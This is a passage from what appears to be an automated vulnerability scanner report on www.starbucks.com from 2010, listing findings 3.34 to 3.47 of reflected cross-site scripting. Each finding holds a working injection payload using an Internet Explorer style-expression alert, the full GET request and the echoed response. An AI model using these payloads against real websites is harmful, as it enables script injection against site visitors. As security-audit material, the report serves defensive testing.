HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:05 GMT
Connection: close
Content-Length: 53500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/entertainment?1c416"style="x:expression(alert(1))"6c5f6b29f5d=1"/>
...[SNIP]...

3.34. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48dbe"style%3d"x%3aexpression(alert(1))"2be3e39534b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48dbe"style="x:expression(alert(1))"2be3e39534b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps?48dbe"style%3d"x%3aexpression(alert(1))"2be3e39534b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:51 GMT
Connection: close
Content-Length: 42056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps?48dbe"style="x:expression(alert(1))"2be3e39534b=1"/>
...[SNIP]...

3.35. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/mystarbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26134"style%3d"x%3aexpression(alert(1))"dc4b3c470d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26134"style="x:expression(alert(1))"dc4b3c470d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps/mystarbucks?26134"style%3d"x%3aexpression(alert(1))"dc4b3c470d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:43:06 GMT
Connection: close
Content-Length: 37880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks?26134"style="x:expression(alert(1))"dc4b3c470d=1"/>
...[SNIP]...

3.36. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 462d1"style%3d"x%3aexpression(alert(1))"ac69f70948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 462d1"style="x:expression(alert(1))"ac69f70948 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile?462d1"style%3d"x%3aexpression(alert(1))"ac69f70948=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:56 GMT
Connection: close
Content-Length: 39150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile?462d1"style="x:expression(alert(1))"ac69f70948=1"/>
...[SNIP]...

3.37. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile-bb

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de919"style%3d"x%3aexpression(alert(1))"904c963c339 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de919"style="x:expression(alert(1))"904c963c339 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile-bb?de919"style%3d"x%3aexpression(alert(1))"904c963c339=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:43:31 GMT
Connection: close
Content-Length: 39649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb?de919"style="x:expression(alert(1))"904c963c339=1"/>
...[SNIP]...

3.38. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/store-design

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b663f"style%3d"x%3aexpression(alert(1))"fd0669f60f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b663f"style="x:expression(alert(1))"fd0669f60f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/store-design?b663f"style%3d"x%3aexpression(alert(1))"fd0669f60f4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:48:45 GMT
Connection: close
Content-Length: 44147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/store-design?b663f"style="x:expression(alert(1))"fd0669f60f4=1"/>
...[SNIP]...

3.39. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8449"style%3d"x%3aexpression(alert(1))"73d4ee3cd6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8449"style="x:expression(alert(1))"73d4ee3cd6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/wireless-internet?a8449"style%3d"x%3aexpression(alert(1))"73d4ee3cd6d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:32 GMT
Connection: close
Content-Length: 37927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet?a8449"style="x:expression(alert(1))"73d4ee3cd6d=1"/>
...[SNIP]...

3.40. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/in-canada

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc3da"style%3d"x%3aexpression(alert(1))"1f3227134dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc3da"style="x:expression(alert(1))"1f3227134dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/wireless-internet/in-canada?fc3da"style%3d"x%3aexpression(alert(1))"1f3227134dc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:09 GMT
Connection: close
Content-Length: 38207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/in-canada?fc3da"style="x:expression(alert(1))"1f3227134dc=1"/>
...[SNIP]...

3.41. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/starbucks-digital-network

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f393"style%3d"x%3aexpression(alert(1))"bf3de1874fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f393"style="x:expression(alert(1))"bf3de1874fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/wireless-internet/starbucks-digital-network?6f393"style%3d"x%3aexpression(alert(1))"bf3de1874fc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:41:08 GMT
Connection: close
Content-Length: 38665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network?6f393"style="x:expression(alert(1))"bf3de1874fc=1"/>
...[SNIP]...

3.42. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d09"style%3d"x%3aexpression(alert(1))"17035a06782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5d09"style="x:expression(alert(1))"17035a06782 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/contact?e5d09"style%3d"x%3aexpression(alert(1))"17035a06782=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:37:47 GMT
Connection: close
Content-Length: 37097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/contact?e5d09"style="x:expression(alert(1))"17035a06782=1"/>
...[SNIP]...

3.43. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/card

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51bc5"style%3d"x%3aexpression(alert(1))"c6d67963f2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51bc5"style="x:expression(alert(1))"c6d67963f2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/card?51bc5"style%3d"x%3aexpression(alert(1))"c6d67963f2f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:36:59 GMT
Connection: close
Content-Length: 87713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/card?51bc5"style="x:expression(alert(1))"c6d67963f2f=1"/>
...[SNIP]...

3.44. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8de96"style="x:expression(alert(1))"6b0cfc1dd14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/coffee?8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:45 GMT
Connection: close
Content-Length: 37419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffee?8de96"style="x:expression(alert(1))"6b0cfc1dd14=1"/>
...[SNIP]...

3.45. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19c91"style%3d"x%3aexpression(alert(1))"e534a4ef04b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19c91"style="x:expression(alert(1))"e534a4ef04b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/coffeehouse?19c91"style%3d"x%3aexpression(alert(1))"e534a4ef04b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:35:19 GMT
Connection: close
Content-Length: 58084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffeehouse?19c91"style="x:expression(alert(1))"e534a4ef04b=1"/>
...[SNIP]...

3.46. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/menu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f91e"style%3d"x%3aexpression(alert(1))"2090cf84852 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3f91e"style="x:expression(alert(1))"2090cf84852 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/menu?3f91e"style%3d"x%3aexpression(alert(1))"2090cf84852=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:32:38 GMT
Connection: close
Content-Length: 36961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/menu?3f91e"style="x:expression(alert(1))"2090cf84852=1"/>
...[SNIP]...

3.47. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd41a"style%3d"x%3aexpression(alert(1))"0e8674e1677 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd41a"style="x:expression(alert(1))"0e8674e1677 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/responsibility?dd41a"style%3d"x%3aexpression(alert(1))"0e8674e1677=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:35:18 GMT
Connection: close
Content-Length: 37184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/responsibility?dd41a"style="x:expression(alert(1))"0e8674e1677=1"/>
...[SNIP]...

